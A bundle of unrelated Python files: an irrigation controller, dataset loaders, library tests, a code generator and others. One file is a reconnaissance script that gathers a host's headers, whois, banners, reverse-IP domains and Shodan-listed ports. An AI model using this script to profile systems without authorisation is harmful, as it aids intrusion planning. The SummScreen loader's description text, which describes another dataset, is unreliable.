# Der Reset muss unmittelbar vor dem Shutdown kommen da hiermit der RTC-Ausgang SQW wieder auf 1 geht
rt.reset_alarm1_indicator(rlib.get_rtClock())
os.system("sudo shutdown now")
def bewaesserungsablauf(rtClock, mcp, cfgData, data, dt):
"""
Führt die Messungen durch und speichert die Werte in der JSON-Datenstruktur. Dann prüft er ob die Voraussetzungen für eine Bewässerung vorliegen und startet ggf. die Bewässerungsroutine. Schließlich wird noch die JSON-Datenstruktur sowie die Konfigurationsdatei gespeichert und der nächste Startzeitpunkt bestimmt und in die RTC geschrieben
Parameter
rtClock: Instanz des RTC-Objekts
mcp: Instanz des MCP3008-Objekts (Analog-Digital-Konverter)
data: JSON-Datenobjekt
dt: Datum-Uhrzeit-Objekt mit dem Timestamp des Starts
"""
rlib.sensordaten_auslesen(rtClock, mcp, data)
# Bewässerungslogik startet
if cfgData['Bewaesserung_aktiv']:
if dt.hour in cfgData['Bewaesserungsstunden']:
bf = rlib.bodenfeuchtigkeit_messen(mcp)
if bf[0] > cfgData['Grenzwert_Bodenfeuchtigkeit']:
if cfgData['Anzahl_kein_Wasser'] <= 2:
logger.info("Bewässerung kann starten")
r = res.Reservoir(18,0,1,2,15)
ret = r.fuelleBisLevel(ZIELLEVEL)
if ret==ZIELLEVEL:
logger.info("Reservoir konnte auf Ziellevel {:} gefüllt werden".format(ZIELLEVEL))
cfgData['Anzahl_kein_Wasser'] = 0
else:
logger.info("Füllung Reservoir nur bis Level {:} statt {:} möglich".format(ret, ZIELLEVEL))
cfgData['Anzahl_kein_Wasser'] = cfgData['Anzahl_kein_Wasser'] + 1
logger.info("Wert von Anzahl_kein_Wasser: {:}".format(cfgData['Anzahl_kein_Wasser']))
else:
logger.info("Abbruch da bei den letzten beiden Versuchen kein Wasser verfügbar war")
else:
logger.info("Abbruch Bodensensor zeigt genügend Feuchtigkeit an ({:}/Grenzwert {:})".format(bf[0], cfgData['Grenzwert_Bodenfeuchtigkeit']))
else:
logger.info("keine Uhrzeit für Bewässerung")
else:
logger.info("Bewässerung ist nicht aktiviert")
# Jetzt noch die Daten speichern und RTC auf nächsten Startzeitpunkt programmieren
lib.save_json(cfgData, data)
rlib.naechsten_start_bestimmen(rtClock)
def main():
"""
Initialisiert die Verbindngen zur RTC und den angeschlossenen Sensoren
Prüft ob die Verzögerungs-Pin auf Masse legt bzw. ein bekannter Hotspot erreichbar ist.
Falls ja, wird in den Wartungsmodus verzweigt und der Shutdown um 5 Minuten verzögert, andernfalls wird der normale Zyklus ausgeführt
Parameter
keine
"""
try:
# Den Analog-Digital-Konverter MCP3008 und die RTC und initialisieren
mcp = rlib.get_mcp()
rtClock = rlib.get_rtClock()
# Die Raspi-Uhr nach dem Booten mit Date/Time der RTC versorgen
dt = rtClock.read_datetime()
sp.run(["sudo", "date", "--set", dt.strftime("%Y-%m-%d %H:%M:%S")])
logger.info("Starte Main")
# Konfigurationsdaten und Messwerte aus Dateien lesen
cfgData = lib.read_json_cfg()
data = lib.read_json_data(cfgData)
rlib.set_gpio_settings()
# Prüfen ob Pin PIN_DELAY_SHUTDOWN auf 0 liegt
delayPin = GPIO.input(rlib.PIN_DELAY_SHUTDOWN)
logger.info("Prüfung Pin {:}, Ergebnis: {:}".format(rlib.PIN_DELAY_SHUTDOWN, delayPin))
hotspot_found = rlib.check_hotspot(MOBILER_HOTSPOT)
logger.info("Prüfung auf Hotspot " + MOBILER_HOTSPOT + ". Ergebnis: {:}".format(hotspot_found))
# Falls der Hotspot des Smartphones empfangen wird oder der delayPin auf 0 liegt
# wollen wir uns mit dem Raspi verbinden und nicht dass er sein übliches Programm fährt
if (delayPin==0 or hotspot_found) and not (len(sys.argv)>1 and sys.argv[1]=="ignore"): # mit dem Kommandozeileargument "ignore" kann der normale Ablauf erzwungen werden auch wenn der Hotspot gefunden wurde
logger.info("Breche Programm ab, Shutdown verzoegert da mit mobilem Hotspot " + MOBILER_HOTSPOT + " verbunden oder DelayPin auf 0")
else:
logger.info("Starte Bewässerungsablauf")
bewaesserungsablauf(rtClock, mcp, cfgData, data, dt)
# Shutdown um x min verzögern falls Pin PIN_DELAY_SHUTDOWN auf Masse liegt (Default ist Pullup)
# oder Hotspot gefunden
if delayPin==0 or hotspot_found:
logger.info("Shutdown wird verzoegert um {:} min".format(MIN_DELAY_SHUTDOWN))
time.sleep(MIN_DELAY_SHUTDOWN*60)
# und tschüss
u_bat=rlib.batteriespannung_messen(mcp)
shutdown()
except:
logger.exception("Exception in main")
# Main program loop.
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""Runs graph validation tests in the specified folder."""
import logging
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
from ..hydrators.ingest_hydrator import IngestHydrator
from .test_action import TestAction
from .common import load_test_queries
from ..config import Config
class ValidationHandler():
def __init__(self, subid, graph, test_path):
self._subid = subid
self._graph = graph
self._test_path = test_path
def run(self):
IngestHydrator(self._graph, self._subid).hydrate()
return TestAction(self._graph, self._test_path, False).run()
class ValidationListener(ConsumerMixin):
def __init__(self, connection, validation_queue, graph, test_path):
self.connection = connection
self.validation_queue = validation_queue
self._graph = graph
self._test_path = test_path
self._logger = logging.getLogger(__name__)
def get_consumers(self, Consumer, channel):
return [Consumer(queues=self.validation_queue, accept=["json"], on_message=self.handle_message, prefetch_count=10)]
def handle_message(self, message):
subid = message.payload['submissionEnvelopeUuid']
self._logger.info(f"received validation request for {subid}")
validation_result = ValidationHandler(subid, self._graph, self._test_path).run()
if validation_result is not None:
self._logger.info(f"validation finished for {subid}")
self._logger.debug(f"result: {validation_result}")
message.ack()
class IngestValidatorAction:
def __init__(self, graph, test_path, connection, exchange_name, queue_name, routing_key):
self._graph = graph
self._test_path = test_path
self._connection = connection
self._exchange_name = exchange_name
self._queue_name = queue_name
self._routing_key = routing_key
self._test_queries = {}
"""Test query dict. Keys are test file names, values are cypher queries"""
self._logger = logging.getLogger(__name__)
def run(self):
self._logger.info("loading tests")
self._test_queries = load_test_queries(self._test_path)
self._logger.info(f"loaded [{len(self._test_queries)}] test queries")
validation_exchange = Exchange(self._exchange_name, type='direct')
validation_queue = Queue(self._queue_name, validation_exchange, routing_key=self._routing_key)
with Connection(Config['AMQP_CONNECTION']) as conn:
self._logger.info(f"listening for messages at {conn}")
try:
ValidationListener(conn, validation_queue, self._graph, self._test_path).run()
except KeyboardInterrupt:
self._logger.info("AMQP listener stopped")
|
from pydantic import BaseModel, validator
from tracardi.domain.named_entity import NamedEntity
class PushOverAuth(BaseModel):
token: str
user: str
class PushOverConfiguration(BaseModel):
source: NamedEntity
message: str
@validator("message")
def name_not_empty(cls, value):
if len(value) == 0:
raise ValueError("message can not be empty.")
return value
|
import os
import json
import datasets
"""Summscreen dataset."""
_CITATION = """
@article{DBLP:journals/corr/abs-2104-07091,
author = {Mingda Chen and
Zewei Chu and
Sam Wiseman and
Kevin Gimpel},
title = {SummScreen: {A} Dataset for Abstractive Screenplay Summarization},
journal = {CoRR},
volume = {abs/2104.07091},
year = {2021},
url = {https://arxiv.org/abs/2104.07091},
archivePrefix = {arXiv},
eprint = {2104.07091},
timestamp = {Mon, 19 Apr 2021 16:45:47 +0200},
biburl = {https://dblp.org/rec/journals/corr/abs-2104-07091.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
"""
_DESCRIPTION = """
A summary of scientific papers should ideally incorporate the impact of the papers on the research community
reflected by citations. To facilitate research in citation-aware scientific paper summarization (Scisumm),
the CL-Scisumm shared task has been organized since 2014 for papers in the computational linguistics and NLP domain.
"""
_HOMEPAGE = "https://github.com/mingdachen/SummScreen"
_LICENSE = "MIT Licencse"
_URLs = "https://drive.google.com/uc?id=1BvdIllGBo9d2-bzXQRzWuJXB04XPVmfF"
class SummertimeSummscreen(datasets.GeneratorBasedBuilder):
"""Summscreen dataset."""
VERSION = datasets.Version("1.1.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(),
]
def _info(self):
features = datasets.Features(
{
"entry_number": datasets.Value("string"),
"transcript": datasets.features.Sequence(datasets.Value("string")),
"recap": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
my_urls = _URLs
path = dl_manager.download_and_extract(my_urls)
path = os.path.join(path, "SummScreen")
trainpath_fd = os.path.join("ForeverDreaming", "fd_train.json")
trainpath_tms = os.path.join("TVMegaSite", "tms_train.json")
trainpaths = [trainpath_fd, trainpath_tms]
devpath_fd = os.path.join("ForeverDreaming", "fd_dev.json")
devpath_tms = os.path.join("TVMegaSite", "tms_dev.json")
devpaths = [devpath_fd, devpath_tms]
testpath_fd = os.path.join("ForeverDreaming", "fd_test.json")
testpath_tms = os.path.join("TVMegaSite", "tms_test.json")
testpaths = [testpath_fd, testpath_tms]
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepaths": (path, trainpaths), "split": "train"},
),
datasets.SplitGenerator(
name=datasets.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepaths": (path, devpaths), "split": "dev"},
),
datasets.SplitGenerator(
name=datasets.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={"filepaths": (path, testpaths), "split": "test"},
),
]
def _generate_examples(self, filepaths, split):
"""Yields examples."""
path, relative_filepaths = filepaths
for filepath in relative_filepaths:
extraction_path = os.path.join(path, filepath)
with open(extraction_path, "r") as f:
for line in f:
processed_line = line.replace("@@ ", "")
instance = json.loads(processed_line)
entry = {}
entry["entry_number"] = instance["filename"]
entry["transcript"] = instance["Transcript"]
entry["recap"] = instance["Recap"][
0
] # Recap is a single string in list
yield entry["entry_number"], entry
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
from InnerEyeDataQuality.configs.config_node import ConfigNode
config = ConfigNode()
# data selector
config.selector = ConfigNode()
config.selector.type = None
config.selector.model_name = None
config.selector.model_config_path = None
config.selector.use_active_relabelling = False
# Other selector parameters (unused)
config.selector.training_dynamics_data_path = None
config.selector.burnout_period = 0
config.selector.number_samples_to_relabel = 10
# output files
config.selector.output_directory = None
# tensorboard
config.tensorboard = ConfigNode()
config.tensorboard.save_events = False
def get_default_selector_config() -> ConfigNode:
return config.clone()
|
import os
import tempfile
SLACKVIEWER_TEMP_PATH = os.path.join(tempfile.gettempdir(), "_slackviewer")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import subprocess
import pytest
import pyarrow as pa
def test_get_include():
include_dir = pa.get_include()
assert os.path.exists(os.path.join(include_dir, 'arrow', 'api.h'))
@pytest.mark.skipif('sys.platform != "win32"')
def test_get_library_dirs_win32():
assert any(os.path.exists(os.path.join(directory, 'arrow.lib'))
for directory in pa.get_library_dirs())
def test_cpu_count():
n = pa.cpu_count()
assert n > 0
try:
pa.set_cpu_count(n + 5)
assert pa.cpu_count() == n + 5
finally:
pa.set_cpu_count(n)
def test_build_info():
assert isinstance(pa.cpp_build_info, pa.BuildInfo)
assert isinstance(pa.cpp_version_info, pa.VersionInfo)
assert isinstance(pa.cpp_version, str)
assert isinstance(pa.__version__, str)
assert pa.cpp_build_info.version_info == pa.cpp_version_info
# assert pa.version == pa.__version__ # XXX currently false
def test_runtime_info():
info = pa.runtime_info()
assert isinstance(info, pa.RuntimeInfo)
possible_simd_levels = ('none', 'sse4_2', 'avx', 'avx2', 'avx512')
assert info.simd_level in possible_simd_levels
assert info.detected_simd_level in possible_simd_levels
if info.simd_level != 'none':
env = os.environ.copy()
env['ARROW_USER_SIMD_LEVEL'] = 'none'
code = f"""if 1:
import pyarrow as pa
info = pa.runtime_info()
assert info.simd_level == 'none', info.simd_level
assert info.detected_simd_level == f{info.detected_simd_level!r},\
info.detected_simd_level
"""
subprocess.check_call(["python", "-c", code], env=env)
@pytest.mark.parametrize('klass', [
pa.Field,
pa.Schema,
pa.ChunkedArray,
pa.RecordBatch,
pa.Table,
pa.Buffer,
pa.Array,
pa.Tensor,
pa.DataType,
pa.ListType,
pa.LargeListType,
pa.FixedSizeListType,
pa.UnionType,
pa.SparseUnionType,
pa.DenseUnionType,
pa.StructType,
pa.Time32Type,
pa.Time64Type,
pa.TimestampType,
pa.Decimal128Type,
pa.Decimal256Type,
pa.DictionaryType,
pa.FixedSizeBinaryType,
pa.NullArray,
pa.NumericArray,
pa.IntegerArray,
pa.FloatingPointArray,
pa.BooleanArray,
pa.Int8Array,
pa.Int16Array,
pa.Int32Array,
pa.Int64Array,
pa.UInt8Array,
pa.UInt16Array,
pa.UInt32Array,
pa.UInt64Array,
pa.ListArray,
pa.LargeListArray,
pa.MapArray,
pa.FixedSizeListArray,
pa.UnionArray,
pa.BinaryArray,
pa.StringArray,
pa.FixedSizeBinaryArray,
pa.DictionaryArray,
pa.Date32Array,
pa.Date64Array,
pa.TimestampArray,
pa.Time32Array,
pa.Time64Array,
pa.DurationArray,
pa.Decimal128Array,
pa.Decimal256Array,
pa.StructArray,
pa.Scalar,
pa.BooleanScalar,
pa.Int8Scalar,
pa.Int16Scalar,
pa.Int32Scalar,
pa.Int64Scalar,
pa.UInt8Scalar,
pa.UInt16Scalar,
pa.UInt32Scalar,
pa.UInt64Scalar,
pa.HalfFloatScalar,
pa.FloatScalar,
pa.DoubleScalar,
pa.Decimal128Scalar,
pa.Decimal256Scalar,
pa.Date32Scalar,
pa.Date64Scalar,
pa.Time32Scalar,
pa.Time64Scalar,
pa.TimestampScalar,
pa.DurationScalar,
pa.StringScalar,
pa.BinaryScalar,
pa.FixedSizeBinaryScalar,
pa.ListScalar,
pa.LargeListScalar,
pa.MapScalar,
pa.FixedSizeListScalar,
pa.UnionScalar,
pa.StructScalar,
pa.DictionaryScalar,
pa.ipc.Message,
pa.ipc.MessageReader,
pa.MemoryPool,
pa.LoggingMemoryPool,
pa.ProxyMemoryPool,
])
def test_extension_type_constructor_errors(klass):
# ARROW-2638: prevent calling extension class constructors directly
msg = "Do not call {cls}'s constructor directly, use .* instead."
with pytest.raises(TypeError, match=msg.format(cls=klass.__name__)):
klass()
|
#! /usr/bin/env python
"""
Wrap Savannah River test problem for PCGA
"""
import numpy as np
import setup_savannah
"""
Set the input values for running the problem
"""
##describe the geometry of the problem
grid_gridgen= "./mesh_files/grid_savannah_river_nx501_ny41" #name of xy gridgen file
rect_gridgen= "./mesh_files/rect_savannah_river_nx501_ny41" #name of rectd gridgen file
##filenames running the forward problems
sim_prefix= "./sim_files/savannah_gridgen_new_nx501_ny41" #basename of adh mesh and files for simulation
##spatial location of observations
#filename for velocity observation locations
velocity_obs_file= "./observation_files/observation_loc_drogue12345_50ft.dat" #drifter locations
#filename for elevation observation location
elevation_obs_file= "./observation_files/observation_loc_none.dat" #empty
##solution and mesh information for the reference solution
true_soln_file_h5='./true_files/savannah_gridgen_true_nx501_ny41_p0.h5'
true_soln_meshbase= './true_files/savannah_gridgen_true_nx501_ny41'
##instantiate the class that describes the forward problem geometry, boundary conditions, initial conditions
#inflow discharge and free surface elevation at the boundary
Q_b = 6873.5; z_f=97.14
forward_prob = setup_savannah.SavannahRiver(grid_file=grid_gridgen,rect_file=rect_gridgen,
initial_free_surface_elevation=z_f)
##write out the base mesh, input file, and initial condition file
forward_prob.writeMesh(sim_prefix)
forward_prob.writeBCFile(sim_prefix)
forward_prob.writeHotFile(sim_prefix)
##get the measurement locations
velocity_obs_loc = np.loadtxt(velocity_obs_file)
elev_obs_loc = np.loadtxt(elevation_obs_file)
##instantiate the inverse problem which controls the forward model simulation
prm = setup_savannah.SavannahRiverProblem(forward_prob.mesh,
forward_prob,
velocity_obs_loc,
elev_obs_loc,
sim_prefix=sim_prefix,
debug_rigid_lid=False,
pre_adh_path='../bin/pre_adh',
adh_path='../bin/adh',
true_soln_file_h5=true_soln_file_h5,
true_soln_meshbase= true_soln_meshbase,
Q_b=Q_b,
z_f=z_f)
##go ahead and evaluate once
t0 = 0.
#true solution
x_true = prm.get_true_solution(t0)
#measurment matrix
H_meas = prm.get_measurement_matrix(t0)
x_dummy = x_true.copy()
def get_measurements():
"""
Returns actual measurements for the problem and the degree of freedom indices
Here we are using synthetic measurements
"""
obs = prm.get_measurement(H_meas,x_true,t0)
return obs
def run_forward_model(z_in):
"""
Run forward model and return approximate measured values
"""
x_dummy[:prm.nn]=z_in
x_dummy[prm.nn:]=prm.compute_velocity(z_in,t0)
x_meas = H_meas.dot(x_dummy)
return x_meas
if __name__ == "__main__":
import os
##write out indices so that we can compare with setup_savannah
fortran_base= 1
obs_dir = os.path.dirname(velocity_obs_file)
pdaf_obs_file = os.path.join(obs_dir,'pcga_pdaf_observations.dat')
pdaf_obsind_file = os.path.join(obs_dir,'pcga_pdaf_observations_indices.dat')
obs = get_measurements()
obs_indices = H_meas.indices.copy()
obs_indices += fortran_base
assert obs.shape[0] == prm.nrobs
header='{0:d}'.format(prm.nrobs)
np.savetxt(pdaf_obs_file,obs,header=header,comments='')
assert obs_indices.shape[0] == prm.nrobs
np.savetxt(pdaf_obsind_file,obs_indices,header=header,comments='',fmt='%d')
##now run the forward model with the true bathymetry, calculate the measurements and compare the difference
x_meas = run_forward_model(x_true[:prm.nn])
diff = x_meas - obs
print "max difference between true and calcuated observations = {0:5.5e}".format(np.max(np.absolute(diff)))
|
from project.animals.animal import Animal
from abc import ABC, abstractmethod
class Bird(Animal, ABC):
@abstractmethod
def __init__(self, name: str, weight: float, wing_size: float, food_eaten=0):
super().__init__(name, weight, food_eaten)
self.wing_size = wing_size
def __repr__(self):
return f"{self.__class__.__name__} [{self.name}, {self.wing_size}, {self.weight}, {self.food_eaten}]"
class Owl(Bird):
def __init__(self, name: str, weight: float, wing_size: float):
super().__init__(name, weight, wing_size)
@property
def allowed_foods(self):
return ['Meat']
@property
def weight_gain(self):
return 0.25
@staticmethod
def make_sound():
return "Hoot Hoot"
class Hen(Bird):
def __init__(self, name: str, weight: float, wing_size: float):
super().__init__(name, weight, wing_size)
@property
def allowed_foods(self):
return ['Vegetable', 'Fruit', 'Meat', 'Seed']
@property
def weight_gain(self):
return 0.35
@staticmethod
def make_sound():
return "Cluck"
|
import os
class TestCli(object):
def run_cmd(self, cmd):
result = os.popen(cmd)
return result
def equal(self, cmd, expect):
run = self.run_cmd(cmd)
result = run.read()
# self.assertEqual(result, expect, "Unexpected Result")
assert result.find(expect) >= 0
|
from src.models import Company, Portfolio
class TestCompanyModel:
"""Test new company item."""
def test_create_company(self, company):
"""New company row is added to Company table."""
assert company.id > 0
def test_company_name(self, company):
"""New company name added successfully."""
assert company.name == 'Google'
def test_company_symbol(self, company):
"""New company symbol symbol added successfully"""
assert company.symbol == 'goog'
def test_company_portfolio_id(self, company):
"""New company has associated portfolio"""
assert company.portfolio_id > 0
class TestPortfolioModel:
"""Test new portfolio item."""
def test_create_portfolio(self, portfolio):
assert portfolio.id > 0
def test_portfolio_name(self, portfolio):
assert portfolio.name == 'Default'
def test_portfolio_user_id(self, portfolio):
portfolios = Portfolio.query.all()
assert len(portfolios) == 1
class TestUserModel:
"""Test new user records."""
def test_user_create(self, user):
"""Test that a new user is added to the database on registration"""
assert user.id > 0
def test_user_email(self, user):
"""Test that a user's email is added."""
assert user.email == 'test@test.com'
def test_user_check_password(self, user):
"""Test that a user's password is added."""
from src.models import User
assert User.check_password_hash(user, 'password')
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Code by imanSHA256
import nmap
import requests as re
from bs4 import BeautifulSoup
import socket
import bs4
import sys
default = "\033[0m"
white = '\033[97m'
green = '\033[1;32m'
red = '\033[1;31m'
yellow = '\033[1;33m'
magneta = "\033[35m"
cyan = "\033[36m"
lgray = "\033[37m"
dgray = "\033[90m"
lred = "\033[91m"
lgreen = "\033[92m"
lyellow = "\033[93m"
lblue = "\033[94m"
lmagneta = "\033[95m"
lcyan = "\033[96m"
str_sprt="%s -------------------------------------------------------"
url=sys.argv[1]
description=yellow+"""
_____ _____ ___ _____ _____ _____ _____ _____
| __| | | | |_ _| | | | __| __ |
|__ | | | |_ | | | | --| | __| -|
|_____|_|___| |_| |_| |_____|__|__|_____|__|__|
"""+lblue+"https://github.com/imanSHA256"
print(description)
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Host': 'www.shodan.io'
}
#DNS loockup for hostname
socket_ip=socket.gethostbyname(url)
print(str_sprt % lmagneta )
print('%s Host: ' % lcyan + lyellow + socket_ip )
print(str_sprt % lmagneta )
#header info for hostname
header_data=re.get("https://api.hackertarget.com/httpheaders/?q="+url)
print("%s HTTP Header : " % lcyan + url + " : \n")
print('%s ' % red + header_data.text )
print(str_sprt % lmagneta )
#ports by shodan
shodan_url="https://www.shodan.io/host/"+socket_ip
shodan_content=re.get(shodan_url,headers=headers)
soup=BeautifulSoup(shodan_content.text, 'lxml')
ul=soup.find("ul", class_="ports")
ports=[]
for a in ul.findAll('a', href=True):
ports.append(a['href'].replace('#',''))
str_ports='%s ' + str(ports).replace('[','').replace(']','').replace(',','').replace('\'','')
print("%s Ports:" % cyan + str_ports % lred)
print(str_sprt % lmagneta )
#whois info for hostname
whois_data=re.get("https://api.hackertarget.com/whois/?q="+url)
print("%s whois lookup result for " % lcyan + url + " : \n")
print('%s ' % yellow + whois_data.text )
print(str_sprt % lmagneta )
#banner lookup
banners=re.get("https://api.hackertarget.com/bannerlookup/?q="+socket_ip)
print("%s banner lookup result for " % lcyan +socket_ip + " : \n")
print('%s ' % lgreen + banners.text + "\n" )
print(str_sprt % lmagneta )
#Reverse ip loock up
Domains=re.get("https://api.hackertarget.com/reverseiplookup/?q="+socket_ip)
print("%s reverse ip loockup result for " % lcyan +socket_ip + " : \n")
if "No DNS A records found" in Domains.text:
print('%s ' % default + "No DNS A records found \n")
else:
domains_list = str(Domains.text).split()
for i in domains_list:
print('%s ' % default + "www." + i )
|
from stone.ir import (ApiNamespace, ApiRoute)
from stone.ir import (
Boolean,
Float32,
Float64,
Int32,
Int64,
String,
Timestamp,
UInt32,
UInt64,
unwrap_nullable,
is_composite_type,
is_list_type,
is_struct_type,
Void,
)
from stone.backends import helpers
HEADER = """\
// Copyright (c) Dropbox, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
"""
_reserved_keywords = {
'break', 'default', 'func', 'interface', 'select',
'case', 'defer', 'go', 'map', 'struct',
'chan', 'else', 'goto', 'package', 'switch',
'const', 'fallthrough', 'if', 'range', 'type',
'continue', 'for', 'import', 'return', 'var',
}
_type_table = {
UInt64: 'uint64',
Int64: 'int64',
UInt32: 'uint32',
Int32: 'int32',
Float64: 'float64',
Float32: 'float32',
Boolean: 'bool',
String: 'string',
Timestamp: 'time.Time',
Void: 'struct{}',
}
def _rename_if_reserved(s):
if s in _reserved_keywords:
return s + '_'
else:
return s
def fmt_type(data_type, namespace=None, use_interface=False, raw=False):
data_type, nullable = unwrap_nullable(data_type)
if is_list_type(data_type):
if raw and not _needs_base_type(data_type.data_type):
return "json.RawMessage"
return '[]%s' % fmt_type(data_type.data_type, namespace, use_interface, raw)
if raw:
return "json.RawMessage"
type_name = data_type.name
if use_interface and _needs_base_type(data_type):
type_name = 'Is' + type_name
if is_composite_type(data_type) and namespace is not None and \
namespace.name != data_type.namespace.name:
type_name = data_type.namespace.name + '.' + type_name
if use_interface and _needs_base_type(data_type):
return _type_table.get(data_type.__class__, type_name)
else:
if data_type.__class__ not in _type_table:
return '*' + type_name
if data_type.__class__ == Timestamp:
# For other primitive types, `omitempty` does the job.
return ('*' if nullable else '') + _type_table[data_type.__class__]
return _type_table[data_type.__class__]
def fmt_var(name, export=True, check_reserved=False):
s = helpers.fmt_pascal(name) if export else helpers.fmt_camel(name)
return _rename_if_reserved(s) if check_reserved else s
def _doc_handler(tag, val):
if tag == 'type':
return '`{}`'.format(val)
elif tag == 'route':
return '`{}`'.format(helpers.fmt_camel(val))
elif tag == 'link':
anchor, link = val.rsplit(' ', 1)
return '`{}` <{}>'.format(anchor, link)
elif tag == 'val':
if val == 'null':
return 'nil'
else:
return val
elif tag == 'field':
return '`{}`'.format(val)
else:
raise RuntimeError('Unknown doc ref tag %r' % tag)
def generate_doc(code_generator, t):
doc = t.doc
if doc is None:
doc = 'has no documentation (yet)'
doc = code_generator.process_doc(doc, _doc_handler)
d = '%s : %s' % (fmt_var(t.name), doc)
if isinstance(t, ApiNamespace):
d = 'Package %s : %s' % (t.name, doc)
code_generator.emit_wrapped_text(d, prefix='// ')
# Generate comment for deprecated routes
if isinstance(t, ApiRoute):
if t.deprecated is not None:
d = 'Deprecated: '
if t.deprecated.by is not None:
deprecated_by = t.deprecated.by
fn = fmt_var(deprecated_by.name)
if deprecated_by.version != 1:
fn += 'V%d' % deprecated_by.version
d += 'Use `%s` instead' % fn
code_generator.emit_wrapped_text(d, prefix='// ')
def _needs_base_type(data_type):
if is_struct_type(data_type) and data_type.has_enumerated_subtypes():
return True
if is_list_type(data_type):
return _needs_base_type(data_type.data_type)
return False
def needs_base_type(struct):
for field in struct.fields:
if _needs_base_type(field.data_type):
return True
return False
|
import collections
from typing import Collection, Container
import pandas as pd
import os
# CONSTANT FOR US REGION
NORTH_EAST = ['CT', 'DE', 'MA', 'MD', 'ME', 'NH', 'NJ', 'NY', 'PA', 'RI', 'VT']
MID_WEST = ['IA', 'IL', 'IN', 'KS', 'MI', 'MN', 'MO', 'ND', 'NE', 'OH', 'SD', 'WI']
WEST = ['AK', 'AZ', 'CA', 'CO', 'HI', 'ID', 'MT', 'NM', 'NV', 'OR', 'UT', 'WA', 'WY']
SOUTH = ['AL', 'AR', 'DC', 'DE', 'FL', 'GA', 'KY', 'LA', 'MD', 'MS', 'NC', 'OK', 'SC', 'TN', 'TX', 'VA', 'WV']
def load_and_process_one(source:str):
if not os.path.exists(source):
raise FileExistsError("Path does not exist.")
elif os.path.isdir(source):
raise FileNotFoundError("Expected file path.")
return process(pd.read_csv(source, delimiter=','))
def load_and_process_many(source:str):
if not os.path.exists(source):
raise FileExistsError("Path does not exist.")
elif not os.path.isdir(source):
raise TypeError("Expected directory path.")
parts = ([pd.read_csv(os.path.join(source,file), delimiter=",")
for file in os.listdir(source) if file.endswith(".csv")]
)
return process(pd.concat(parts, axis=0, ignore_index=True))
def process(dataframe:pd.DataFrame):
subset = ["Name","Year", "Gender"]
if "State" in dataframe.columns:
subset.append("State")
return ( dataframe
.drop(columns=['Id'])
.dropna()
.drop_duplicates(subset=subset, keep='first')
.loc[dataframe["Year"] >= 1910]
.reset_index(drop=True)
)
def export_processed_data(data_dict: dict, buffer=os.getcwd(), remove=True):
if not os.path.exists(buffer):
raise FileExistsError("Path does not exists")
elif not os.path.isdir(buffer):
raise TypeError("Expected directory path.")
# Warning: this method will overwrite all existing csv in buffer by default
if remove:
for file in os.listdir(buffer):
removed = list()
if file.endswith(".csv"):
csv = os.path.join(buffer, file)
os.remove(csv)
removed.append(csv)
print("{0}\nThe following csv files have been removed:\n{1}\n{0}".format("="*50, removed))
for name, data in data_dict.items():
name = name+".csv"
data.to_csv(os.path.join(buffer, name), index=True)
print(f"=> Exported {name} to {os.path.abspath(buffer)}")
|
# Инициализируем переменную целочисленным значением
var = 8
print(var)
# Присваиваем переменной значение числа с плавающей точкой
var = 3.142
print(var)
# Присваиваем переменной строковое значение
var = 'Python in easy steps'
print(var)
# Присваиваем переменной логическое значение
var = True
print(var) |
# Alain Dechorgnat
# 05/19/2014
from flask import Flask, request, Response
import json
import requests
import re
from array import *
import sys
sys.path.append("..")
from sfcsmUtil.operate import Operate
class Monitors:
"""docstring for Osds"""
def __init__(self):
pass
class MonitorsCtrl:
def __init__(self, conf):
self.cluster_name = conf['cluster']
ceph_rest_api_subfolder = conf.get("ceph_rest_api_subfolder", "")
ceph_rest_api_subfolder = ceph_rest_api_subfolder.strip('/')
if ceph_rest_api_subfolder != '':
ceph_rest_api_subfolder = "/" + ceph_rest_api_subfolder
self.cephRestApiUrl = "http://" + conf.get("ceph_rest_api", "") + ceph_rest_api_subfolder + "/api/v0.1/"
pass
def getCephRestApiUrl(self):
